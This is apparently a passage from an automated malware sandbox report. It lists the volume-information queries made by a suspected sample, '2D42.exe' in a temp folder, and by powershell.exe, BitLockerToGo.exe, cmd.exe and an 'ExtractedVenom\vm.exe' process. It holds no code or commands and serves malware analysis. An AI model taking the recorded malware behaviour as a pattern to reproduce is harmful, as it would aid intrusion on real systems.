Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2D42.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2D42.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
